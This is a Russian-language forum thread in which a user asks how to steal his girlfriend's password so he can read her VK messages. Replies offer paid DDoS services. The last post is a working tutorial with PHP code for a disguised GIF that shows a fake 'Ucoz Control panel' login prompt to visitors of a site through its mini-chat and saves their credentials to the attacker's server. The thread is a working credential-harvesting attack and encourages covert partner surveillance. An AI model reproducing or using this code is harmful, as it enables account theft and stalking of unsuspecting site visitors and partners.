1. 2xB27.07.2024 в 15:16от
Загрузка...

Ucoz скрипт.(нужна помощь)

Тема в разделе "Курилка", создана пользователем Prodavec, 06.02.2012.

Метки:
  1. Prodavec

    Prodavec

    Статус:
    Оффлайн
    Регистрация:
    08.11.11
    Сообщения:
    80
    Репутация:
    0 +/-
    Привет всем. Нужна помощь. У меня есть сайт ucoz. Там зарегистрирована моя девушка, я хочу посмотреть ее переписку ВК. Могу ли я узнать ее пароль на моем сайте?(я точно знаю что на сайте и в вк у нее одинаковые пароли) Может есть какие-либо скрипты или способ? Спасибо.
     
  2. GoD

    GoD

    Статус:
    Оффлайн
    Регистрация:
    25.01.12
    Сообщения:
    85
    Репутация:
    25 +/-
    Можно сделать скрипт но в паблике такого не видел
     
  3. rising1337

    rising1337

    Статус:
    Оффлайн
    Регистрация:
    20.12.11
    Сообщения:
    74
    Репутация:
    26 +/-
    По-моему, на юкозе нету доступа с базе.
    Получается, что нельзя узнать пасс.

    П.с. Давно юкозом не пользовался. Возможно, произошли какие-то изменения.
     
  4. Prodavec

    Prodavec

    Статус:
    Оффлайн
    Регистрация:
    08.11.11
    Сообщения:
    80
    Репутация:
    0 +/-
    Может тогда можно к себе на сайт троян подбросить?
     
  5. LogoS

    LogoS

    Статус:
    Оффлайн
    Регистрация:
    14.05.11
    Сообщения:
    877
    Репутация:
    316 +/-
    Это платно , и это не троян а ддос , около 280 рублей .
     
  6. Prodavec

    Prodavec

    Статус:
    Оффлайн
    Регистрация:
    08.11.11
    Сообщения:
    80
    Репутация:
    0 +/-
    LogoS, не подскажешь, где можно купить?
     
  7. ProToSS

    ProToSS

    Статус:
    Оффлайн
    Регистрация:
    31.01.12
    Сообщения:
    336
    Репутация:
    176 +/-
    Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким=).

    Итак, начнем...
    Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
    Затем откройте блокнот, да простой блокнот и напишите следующее:


    <?
    header("Content-type: image/gif");
    $image = imagecreatefromgif('cool.gif');
    if(!$_COOKIE['LOGON'])
    {
    $login = $_SERVER['PHP_AUTH_USER'];
    $pass = $_SERVER['PHP_AUTH_PW'];
    if(strlen($pass) <= 4 || !$login)
    {
    Header('HTTP/1.1 401 Unauthorized');
    Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
    }
    elseif($login)
    {
    setcookie('LOGON',md5($pass));
    $f = fopen('passwords.txt', 'ab');
    fwrite($f, $login." ||| ".$pass."\r\n");
    fclose($f);
    }
    }
    imagegif($image);
    imagedestroy($image);
    ?>


    Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
    Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:

    [ IMG]http://mysite.phphost.net/smile.gif[/IMG ] - без пробелов

    И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.

    Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет =)))
    ________________________________________
    Если Помогло Ставьте Плюсик)